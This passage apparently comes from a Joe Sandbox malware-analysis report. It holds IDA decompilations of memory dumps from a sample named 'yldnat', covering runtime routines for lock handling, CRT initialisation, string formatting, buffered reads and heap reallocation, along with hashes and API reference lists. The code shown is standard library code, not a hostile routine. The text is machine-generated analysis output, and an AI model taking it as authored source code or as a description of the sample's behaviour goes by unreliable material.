                                                        															_t63 = L0085F970( *((intOrPtr*)(_t138 + 0x20)));
                                                        															__eflags = _t63;
                                                        															if(__eflags >= 0) {
                                                        																goto L2;
                                                        															} else {
                                                        																_push(_t63);
                                                        																_t66 = L008A3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                        																asm("int3");
                                                        																while(1) {
                                                        																	_t110 = _t66;
                                                        																	__eflags = _t66 - 1;
                                                        																	if(_t66 != 1) {
                                                        																		break;
                                                        																	}
                                                        																	_t128 = _t128 | 0xffffffff;
                                                        																	_t66 = _t110;
                                                        																	asm("lock cmpxchg [ebx], edi");
                                                        																	__eflags = _t66 - _t110;
                                                        																	if(_t66 != _t110) {
                                                        																		continue;
                                                        																	} else {
                                                        																		_t67 =  *[fs:0x18];
                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                        																		return _t67;
                                                        																	}
                                                        																	goto L59;
                                                        																}
                                                        																E00885329(_t110, _t138);
                                                        																_t69 = E008853A5(_t138, 1);
                                                        																return _t69;
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											} else {
                                                        												_t56 =  *(_t96 + 0x28);
                                                        												goto L3;
                                                        											}
                                                        										} else {
                                                        											_t107 =  *_t119;
                                                        											__eflags = _t107;
                                                        											if(__eflags > 0) {
                                                        												while(1) {
                                                        													_t81 = _t107;
                                                        													asm("lock cmpxchg [edi], esi");
                                                        													__eflags = _t81 - _t107;
                                                        													if(_t81 == _t107) {
                                                        														break;
                                                        													}
                                                        													_t107 = _t81;
                                                        													__eflags = _t81;
                                                        													if(_t81 > 0) {
                                                        														continue;
                                                        													}
                                                        													break;
                                                        												}
                                                        												_t56 = _a4;
                                                        												__eflags = _t107;
                                                        											}
                                                        											if(__eflags != 0) {
                                                        												while(1) {
                                                        													L3:
                                                        													__eflags = _t56;
                                                        													if(_t56 != 0) {
                                                        														goto L32;
                                                        													}
                                                        													_t107 = _t107 | 0xffffffff;
                                                        													_t56 = 0;
                                                        													asm("lock cmpxchg [edx], ecx");
                                                        													__eflags = 0;
                                                        													if(0 != 0) {
                                                        														continue;
                                                        													} else {
                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        														return 1;
                                                        													}
                                                        													goto L59;
                                                        												}
                                                        												continue;
                                                        											} else {
                                                        												goto L40;
                                                        											}
                                                        										}
                                                        										goto L59;
                                                        									}
                                                        									__eflags = 0;
                                                        									return 0;
                                                        								} else {
                                                        									_t115 =  *(_t96 + 0x28);
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								_t106 =  *_t49;
                                                        								__eflags = _t106;
                                                        								if(__eflags > 0) {
                                                        									while(1) {
                                                        										_t93 = _t106;
                                                        										asm("lock cmpxchg [edi], esi");
                                                        										__eflags = _t93 - _t106;
                                                        										if(_t93 == _t106) {
                                                        											break;
                                                        										}
                                                        										_t106 = _t93;
                                                        										__eflags = _t93;
                                                        										if(_t93 > 0) {
                                                        											continue;
                                                        										}
                                                        										break;
                                                        									}
                                                        									__eflags = _t106;
                                                        								}
                                                        								if(__eflags != 0) {
                                                        									continue;
                                                        								} else {
                                                        									goto L23;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L59;
                                                        					}
                                                        					_t84 = _t115;
                                                        					asm("lock cmpxchg [esi], ecx");
                                                        					__eflags = _t84 - _t115;
                                                        					if(_t84 != _t115) {
                                                        						_t115 = _t84;
                                                        						goto L7;
                                                        					} else {
                                                        						return 1;
                                                        					}
                                                        				}
                                                        				L59:
                                                        			}

                                                        Instruction addresses (the per-line address column of the C-code above, flattened by extraction into one value per line; 0x00000000 marks lines with no address): 0x008a055a-0x008a05f3, 0x008c2178-0x008c23d7, 0x00885367-0x008853ea, 0x008b9153-0x008b9176

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C2206
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-4236105082
                                                        • Opcode ID: 78c28a735a068ff64d625ba304aee8b126f87318016234abd6c2291446612c58
                                                        • Instruction ID: 9904a52d0e11ce428d9b793c28d47eb6759510b5c8d57c211acc56f2d56a4574
                                                        • Opcode Fuzzy Hash: 78c28a735a068ff64d625ba304aee8b126f87318016234abd6c2291446612c58
                                                        • Instruction Fuzzy Hash: CB512531B002016BEB15DA18CC82FA673A9FF95720F25822DFD55DB3C6DA75EC418B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 91%
                                                        			E013B3815(void* __ebx, void* __edi, void* __eflags) {
                                                        				void* __esi;
                                                        				void* _t3;
                                                        				intOrPtr _t6;
                                                        				long _t14;
                                                        				long* _t27;
                                                        
                                                        				E013B1890(_t3);
                                                        				if(E013B4560() != 0) {
                                                        					_t6 = E013B4001(E013B35A6);
                                                        					 *0x13c350c = _t6;
                                                        					__eflags = _t6 - 0xffffffff;
                                                        					if(_t6 == 0xffffffff) {
                                                        						goto L1;
                                                        					} else {
                                                        						_t27 = E013B4869(1, 0x3bc);
                                                        						__eflags = _t27;
                                                        						if(_t27 == 0) {
                                                        							L6:
                                                        							E013B388B();
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							__eflags = E013B405D( *0x13c350c, _t27);
                                                        							if(__eflags == 0) {
                                                        								goto L6;
                                                        							} else {
                                                        								_push(0);
                                                        								_push(_t27);
                                                        								E013B3762(__ebx, __edi, _t27, __eflags);
                                                        								_t14 = GetCurrentThreadId();
                                                        								_t27[1] = _t27[1] | 0xffffffff;
                                                        								 *_t27 = _t14;
                                                        								__eflags = 1;
                                                        								return 1;
                                                        							}
                                                        						}
                                                        					}
                                                        				} else {
                                                        					L1:
                                                        					E013B388B();
                                                        					return 0;
                                                        				}
                                                        			}
                                                        0x013b3815
                                                        0x013b3821
                                                        0x013b3830
                                                        0x013b3835
                                                        0x013b383b
                                                        0x013b383e
                                                        0x00000000
                                                        0x013b3840
                                                        0x013b384d
                                                        0x013b3851
                                                        0x013b3853
                                                        0x013b3882
                                                        0x013b3882
                                                        0x013b3887
                                                        0x013b388a
                                                        0x013b3855
                                                        0x013b3863
                                                        0x013b3865
                                                        0x00000000
                                                        0x013b3867
                                                        0x013b3867
                                                        0x013b3869
                                                        0x013b386a
                                                        0x013b3871
                                                        0x013b3877
                                                        0x013b387b
                                                        0x013b387f
                                                        0x013b3881
                                                        0x013b3881
                                                        0x013b3865
                                                        0x013b3853
                                                        0x013b3823
                                                        0x013b3823
                                                        0x013b3823
                                                        0x013b382a
                                                        0x013b382a

                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 013B3815
                                                          • Part of subcall function 013B1890: EncodePointer.KERNEL32(00000000,?,013B381A,013B163A,013C2190,00000014), ref: 013B1893
                                                          • Part of subcall function 013B1890: __initp_misc_winsig.LIBCMT ref: 013B18AE
                                                          • Part of subcall function 013B1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 013B4117
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 013B412B
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 013B413E
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 013B4151
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 013B4164
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 013B4177
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 013B418A
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 013B419D
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 013B41B0
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 013B41C3
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 013B41D6
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 013B41E9
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 013B41FC
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 013B420F
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 013B4222
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 013B4235
                                                        • __mtinitlocks.LIBCMT ref: 013B381A
                                                        • __mtterm.LIBCMT ref: 013B3823
                                                          • Part of subcall function 013B388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,013B3828,013B163A,013C2190,00000014), ref: 013B447A
                                                          • Part of subcall function 013B388B: _free.LIBCMT ref: 013B4481
                                                          • Part of subcall function 013B388B: DeleteCriticalSection.KERNEL32(013C3558,?,?,013B3828,013B163A,013C2190,00000014), ref: 013B44A3
                                                        • __calloc_crt.LIBCMT ref: 013B3848
                                                        • __initptd.LIBCMT ref: 013B386A
                                                        • GetCurrentThreadId.KERNEL32(013B163A,013C2190,00000014), ref: 013B3871
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
                                                        • Opcode ID: a3341522df69caadc8c04ee5c7168d8094e6b8cd2ca5b32baa230ad00c5bf104
                                                        • Instruction ID: 4ff6e06c271ae31320a9a8c990d9df11fcff4c1183c2e4631f0cd89de2c6d58c
                                                        • Opcode Fuzzy Hash: a3341522df69caadc8c04ee5c7168d8094e6b8cd2ca5b32baa230ad00c5bf104
                                                        • Instruction Fuzzy Hash: 89F09032509632ADE239767D7CC16DA2E84EF1177CF20862EE761D8CD1FF2294414795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E008A14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                        				signed int _v8;
                                                        				char _v10;
                                                        				char _v140;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t24;
                                                        				void* _t26;
                                                        				signed int _t29;
                                                        				signed int _t34;
                                                        				signed int _t40;
                                                        				intOrPtr _t45;
                                                        				void* _t51;
                                                        				intOrPtr* _t52;
                                                        				void* _t54;
                                                        				signed int _t57;
                                                        				void* _t58;
                                                        
                                                        				_t51 = __edx;
                                                        				_t24 =  *0x942088; // 0x75aef0bc
                                                        				_v8 = _t24 ^ _t57;
                                                        				_t45 = _a16;
                                                        				_t53 = _a4;
                                                        				_t52 = _a20;
                                                        				if(_a4 == 0 || _t52 == 0) {
                                                        					L10:
                                                        					_t26 = 0xc000000d;
                                                        				} else {
                                                        					if(_t45 == 0) {
                                                        						if( *_t52 == _t45) {
                                                        							goto L3;
                                                        						} else {
                                                        							goto L10;
                                                        						}
                                                        					} else {
                                                        						L3:
                                                        						_t28 =  &_v140;
                                                        						if(_a12 != 0) {
                                                        							_push("[");
                                                        							_push(0x41);
                                                        							_push( &_v140);
                                                        							_t29 = E00897707();
                                                        							_t58 = _t58 + 0xc;
                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                        						}
                                                        						_t54 = E008A13CB(_t53, _t28);
                                                        						if(_a8 != 0) {
                                                        							_t34 = E00897707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                        							_t58 = _t58 + 0x10;
                                                        							_t54 = _t54 + _t34 * 2;
                                                        						}
                                                        						if(_a12 != 0) {
                                                        							_t40 = E00897707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                        							_t58 = _t58 + 0x10;
                                                        							_t54 = _t54 + _t40 * 2;
                                                        						}
                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                        						 *_t52 = _t53;
                                                        						if( *_t52 < _t53) {
                                                        							goto L10;
                                                        						} else {
                                                        							E00862340(_t45,  &_v140, _t53 + _t53);
                                                        							_t26 = 0;
                                                        						}
                                                        					}
                                                        				}
                                                        				return E0086E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                        			}
                                                        0x008a14c0
                                                        0x008a14cb
                                                        0x008a14d2
                                                        0x008a14d6
                                                        0x008a14da
                                                        0x008a14de
                                                        0x008a14e3
                                                        0x008a157a
                                                        0x008a157a
                                                        0x008a14f1
                                                        0x008a14f3
                                                        0x008cea0f
                                                        0x00000000
                                                        0x008cea15
                                                        0x00000000
                                                        0x008cea15
                                                        0x008a14f9
                                                        0x008a14f9
                                                        0x008a14fe
                                                        0x008a1504
                                                        0x008cea1a
                                                        0x008cea1f
                                                        0x008cea21
                                                        0x008cea22
                                                        0x008cea27
                                                        0x008cea2a
                                                        0x008cea2a
                                                        0x008a1515
                                                        0x008a1517
                                                        0x008a156d
                                                        0x008a1572
                                                        0x008a1575
                                                        0x008a1575
                                                        0x008a151e
                                                        0x008cea50
                                                        0x008cea55
                                                        0x008cea58
                                                        0x008cea58
                                                        0x008a152e
                                                        0x008a1531
                                                        0x008a1533
                                                        0x00000000
                                                        0x008a1535
                                                        0x008a1541
                                                        0x008a1549
                                                        0x008a1549
                                                        0x008a1533
                                                        0x008a14f3
                                                        0x008a1559

                                                        APIs
                                                        • ___swprintf_l.LIBCMT ref: 008CEA22
                                                          • Part of subcall function 008A13CB: ___swprintf_l.LIBCMT ref: 008A146B
                                                          • Part of subcall function 008A13CB: ___swprintf_l.LIBCMT ref: 008A1490
                                                        • ___swprintf_l.LIBCMT ref: 008A156D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: cc92d8ec2328f0aa864413295444bc83bc15c5e9656dca28e2289561b514dafc
                                                        • Instruction ID: e644364c94771da54c6eac93dd1c5f7a26548947b63f74372b4729cd20dfdb2a
                                                        • Opcode Fuzzy Hash: cc92d8ec2328f0aa864413295444bc83bc15c5e9656dca28e2289561b514dafc
                                                        • Instruction Fuzzy Hash: 1D21C172D00229ABDF20EE58CC45AEA73BCFB91714F494465FC46D3640DB74EA588BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 69%
                                                        			E013B12B8(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                        				char* _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				void* __ebx;
                                                        				void* __esi;
                                                        				signed int _t74;
                                                        				signed int _t78;
                                                        				char _t81;
                                                        				signed int _t86;
                                                        				signed int _t88;
                                                        				signed int _t91;
                                                        				signed int _t94;
                                                        				signed int _t97;
                                                        				signed int _t98;
                                                        				char* _t99;
                                                        				signed int _t100;
                                                        				signed int _t102;
                                                        				signed int _t103;
                                                        				signed int _t104;
                                                        				char* _t110;
                                                        				signed int _t113;
                                                        				signed int _t117;
                                                        				signed int _t119;
                                                        				void* _t120;
                                                        
                                                        				_t99 = _a4;
                                                        				_t74 = _a8;
                                                        				_v8 = _t99;
                                                        				_v12 = _t74;
                                                        				if(_a12 == 0) {
                                                        					L5:
                                                        					return 0;
                                                        				}
                                                        				_t97 = _a16;
                                                        				if(_t97 == 0) {
                                                        					goto L5;
                                                        				}
                                                        				if(_t99 != 0) {
                                                        					_t119 = _a20;
                                                        					__eflags = _t119;
                                                        					if(_t119 == 0) {
                                                        						L9:
                                                        						__eflags = _a8 - 0xffffffff;
                                                        						if(_a8 != 0xffffffff) {
                                                        							_t74 = E013B1530(_t99, 0, _a8);
                                                        							_t120 = _t120 + 0xc;
                                                        						}
                                                        						__eflags = _t119;
                                                        						if(_t119 == 0) {
                                                        							goto L3;
                                                        						} else {
                                                        							_t78 = _t74 | 0xffffffff;
                                                        							__eflags = _t97 - _t78 / _a12;
                                                        							if(_t97 > _t78 / _a12) {
                                                        								goto L3;
                                                        							}
                                                        							L13:  // 0x013b132e
                                                        							_t117 = _a12 * _t97;  // 0x013b1331
                                                        							__eflags =  *(_t119 + 0xc) & 0x0000010c;  // 0x013b1334
                                                        							_t98 = _t117;  // 0x013b133b
                                                        							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {  // 0x013b133d
                                                        								_t100 = 0x1000;  // 0x013b1344
                                                        							} else {  // 0x013b133f
                                                        								_t100 =  *(_t119 + 0x18);  // 0x013b133f
                                                        							}  // 0x013b133f
                                                        							_v16 = _t100;  // 0x013b1349
                                                        							__eflags = _t117;  // 0x013b134c
                                                        							if(_t117 == 0) {  // 0x013b134e
                                                        								L41:  // 0x013b1437
                                                        								return _a16;  // 0x00000000
                                                        							} else {  // 0x013b1354
                                                        								do {  // 0x013b1354
                                                        									__eflags =  *(_t119 + 0xc) & 0x0000010c;  // 0x013b1354
                                                        									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {  // 0x013b135b
                                                        										L24:  // 0x013b139c
                                                        										__eflags = _t98 - _t100;  // 0x013b139c
                                                        										if(_t98 < _t100) {  // 0x013b139e
                                                        											_t81 = E013B2752(_t98, _t119, _t119);  // 0x013b1409
                                                        											__eflags = _t81 - 0xffffffff;  // 0x013b140f
                                                        											if(_t81 == 0xffffffff) {  // 0x013b1412
                                                        												L46:  // 0x013b1469
                                                        												return (_t117 - _t98) / _a12;  // 0x00000000
                                                        											}  // 0x013b146f
                                                        											_t102 = _v12;  // 0x013b1414
                                                        											__eflags = _t102;  // 0x013b1417
                                                        											if(_t102 == 0) {  // 0x013b1419
                                                        												L42:  // 0x013b143f
                                                        												__eflags = _a8 - 0xffffffff;  // 0x013b143f
                                                        												if(_a8 != 0xffffffff) {  // 0x013b1443
                                                        													E013B1530(_a4, 0, _a8);  // 0x013b144d
                                                        												}  // 0x013b1452
                                                        												 *((intOrPtr*)(E013B1CC3())) = 0x22;  // 0x013b145a
                                                        												L4:  // 0x013b12e9
                                                        												E013B1E89();  // 0x013b12e9
                                                        												goto L5;  // 0x00000000
                                                        											}  // 0x013b12e9
                                                        											_t110 = _v8;  // 0x013b141b
                                                        											 *_t110 = _t81;  // 0x013b141e
                                                        											_t98 = _t98 - 1;  // 0x013b1421
                                                        											_v8 = _t110 + 1;  // 0x013b1422
                                                        											_t103 = _t102 - 1;  // 0x013b1425
                                                        											__eflags = _t103;  // 0x013b1425
                                                        											_v12 = _t103;  // 0x013b1426
                                                        											_t100 =  *(_t119 + 0x18);  // 0x013b1429
                                                        											_v16 = _t100;  // 0x013b142c
                                                        											goto L40;  // 0x00000000
                                                        										}  // 0x013b142c
                                                        										__eflags = _t100;  // 0x013b13a0
                                                        										if(_t100 == 0) {  // 0x013b13a2
                                                        											_t86 = 0x7fffffff;  // 0x013b13c6
                                                        											__eflags = _t98 - 0x7fffffff;  // 0x013b13cb
                                                        											if(_t98 <= 0x7fffffff) {  // 0x013b13d1
                                                        												_t86 = _t98;  // 0x013b13d3
                                                        											}  // 0x013b13d3
                                                        										} else {  // 0x013b13a4
                                                        											__eflags = _t98 - 0x7fffffff;  // 0x013b13a6
                                                        											if(_t98 <= 0x7fffffff) {  // 0x013b13ac
                                                        												_t44 = _t98 % _t100;  // 0x013b13be
                                                        												__eflags = _t44;  // 0x013b13be
                                                        												_t113 = _t44;  // 0x013b13be
                                                        												_t91 = _t98;  // 0x013b13c0
                                                        											} else {  // 0x013b13ae
                                                        												_t113 = 0x7fffffff % _t100;  // 0x013b13b3
                                                        												_t91 = 0x7fffffff;  // 0x013b13b5
                                                        											}  // 0x013b13b5
                                                        											_t86 = _t91 - _t113;  // 0x013b13c2
                                                        										}  // 0x013b13c2
                                                        										__eflags = _t86 - _v12;  // 0x013b13d5
                                                        										if(_t86 > _v12) {  // 0x013b13d8
                                                        											goto L42;  // 0x00000000
                                                        										} else {  // 0x013b13da
                                                        											_push(_t86);  // 0x013b13da
                                                        											_push(_v8);  // 0x013b13db
                                                        											_push(E013B2873(_t119));  // 0x013b13e5
                                                        											_t88 = E013B2A2A();  // 0x013b13e6
                                                        											_t120 = _t120 + 0xc;  // 0x013b13eb
                                                        											__eflags = _t88;  // 0x013b13ee
                                                        											if(_t88 == 0) {  // 0x013b13f0
                                                        												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;  // 0x013b1477
                                                        												goto L46;  // 0x00000000
                                                        											}  // 0x013b1477
                                                        											__eflags = _t88 - 0xffffffff;  // 0x013b13f6
                                                        											if(_t88 == 0xffffffff) {  // 0x013b13f9
                                                        												L45:  // 0x013b1465
                                                        												_t64 = _t119 + 0xc;  // 0x013b1465
                                                        												 *_t64 =  *(_t119 + 0xc) | 0x00000020;  // 0x013b1465
                                                        												__eflags =  *_t64;  // 0x013b1465
                                                        												goto L46;  // 0x00000000
                                                        											}  // 0x013b1465
                                                        											_t98 = _t98 - _t88;  // 0x013b13fb
                                                        											__eflags = _t98;  // 0x013b13fb
                                                        											L36:  // 0x013b13fd
                                                        											_v8 = _v8 + _t88;  // 0x013b13fd
                                                        											_v12 = _v12 - _t88;  // 0x013b1400
                                                        											_t100 = _v16;  // 0x013b1403
                                                        											goto L40;  // 0x00000000
                                                        										}  // 0x013b1403
                                                        									}  // 0x013b13d8
                                                        									_t94 =  *(_t119 + 4);  // 0x013b135d
                                                        									_v20 = _t94;  // 0x013b1360
                                                        									__eflags = _t94;  // 0x013b1363
                                                        									if(__eflags == 0) {  // 0x013b1365
                                                        										goto L24;  // 0x00000000
                                                        									}  // 0x00000000
                                                        									if(__eflags < 0) {  // 0x013b1367
                                                        										goto L45;  // 0x00000000
                                                        									}  // 0x00000000
                                                        									__eflags = _t98 - _t94;  // 0x013b136d
                                                        									if(_t98 < _t94) {  // 0x013b136f
                                                        										_t94 = _t98;  // 0x013b1371
                                                        										_v20 = _t98;  // 0x013b1373
                                                        									}  // 0x013b1373
                                                        									_t104 = _v12;  // 0x013b1376
                                                        									__eflags = _t94 - _t104;  // 0x013b1379
                                                        									if(_t94 > _t104) {  // 0x013b137b
                                                        										goto L42;  // 0x00000000
                                                        									} else {  // 0x013b1381
                                                        										E013B2897(_v8, _t104,  *_t119, _t94);  // 0x013b1388
                                                        										_t88 = _v20;  // 0x013b138d
                                                        										_t120 = _t120 + 0x10;  // 0x013b1390
                                                        										 *(_t119 + 4) =  *(_t119 + 4) - _t88;  // 0x013b1393
                                                        										_t98 = _t98 - _t88;  // 0x013b1396
                                                        										 *_t119 =  *_t119 + _t88;  // 0x013b1398
                                                        										goto L36;  // 0x00000000
                                                        									}  // 0x013b1398
                                                        									L40:  // 0x013b142f
                                                        									__eflags = _t98;  // 0x013b142f
                                                        								} while (_t98 != 0);  // 0x013b142f
                                                        								goto L41;  // 0x00000000
                                                        							}  // 0x013b1354
                                                        						}  // 0x013b134e
                                                        					}  // 0x013b1320
                                                        					_t74 = (_t74 | 0xffffffff) / _a12;  // 0x013b1303
                                                        					__eflags = _t97 - _t74;  // 0x013b1306
                                                        					if(_t97 <= _t74) {  // 0x013b1308
                                                        						goto L13;  // 0x00000000
                                                        					}  // 0x00000000
                                                        					goto L9;  // 0x00000000
                                                        				}  // 0x013b1308
                                                        				L3:  // 0x013b12de
                                                        				 *((intOrPtr*)(E013B1CC3())) = 0x16;  // 0x013b12e3
                                                        				goto L4;  // 0x00000000
                                                        			}

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: 55d99c3bc2fc2accb151bd68b8c7c5b1b205c24243914e167072cac61f5e5b14
                                                        • Instruction ID: acacb248b804a03453a91d40d44469e5890e7d70ccea0f1c8cc7e2e41a98c018
                                                        • Opcode Fuzzy Hash: 55d99c3bc2fc2accb151bd68b8c7c5b1b205c24243914e167072cac61f5e5b14
                                                        • Instruction Fuzzy Hash: 2751EA70A013099BDB248F6DE8E05EE7BB5AF40328F148729EB29D6ED0F77499508B41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 95%
                                                        			E013B7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                        				void* _t7;
                                                        				void* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t12;
                                                        				void* _t20;
                                                        				long _t31;
                                                        
                                                        				if(_a4 != 0) {  // 0x013b7459
                                                        					_t31 = _a8;  // 0x013b7467
                                                        					if(_t31 != 0) {  // 0x013b746c
                                                        						_push(__ebx);  // 0x013b747b
                                                        						while(_t31 <= 0xffffffe0) {  // 0x013b74ae
                                                        							if(_t31 == 0) {  // 0x013b7480
                                                        								_t31 = _t31 + 1;  // 0x013b7482
                                                        							}  // 0x013b7482
                                                        							_t7 = HeapReAlloc( *0x13c4834, 0, _a4, _t31);  // 0x013b748f
                                                        							_t20 = _t7;  // 0x013b7495
                                                        							if(_t20 != 0) {  // 0x013b7499
                                                        								L17:  // 0x013b74f9
                                                        								_t8 = _t20;  // 0x013b74f9
                                                        							} else {  // 0x013b749b
                                                        								if( *0x13c4830 == _t7) {  // 0x013b74a1
                                                        									_t9 = E013B1CC3();  // 0x013b74e3
                                                        									 *_t9 = E013B1CD6(GetLastError());  // 0x013b74f7
                                                        									goto L17;  // 0x00000000
                                                        								} else {  // 0x013b74a3
                                                        									if(E013B1741(_t7, _t31) == 0) {  // 0x013b74ac
                                                        										_t12 = E013B1CC3();  // 0x013b74cb
                                                        										 *_t12 = E013B1CD6(GetLastError());  // 0x013b74df
                                                        										L12:  // 0x013b74c5
                                                        										_t8 = 0;  // 0x013b74c5
                                                        									} else {  // 0x00000000
                                                        										continue;  // 0x00000000
                                                        									}  // 0x00000000
                                                        								}  // 0x013b74ac
                                                        							}  // 0x013b74a1
                                                        							goto L14;  // 0x00000000
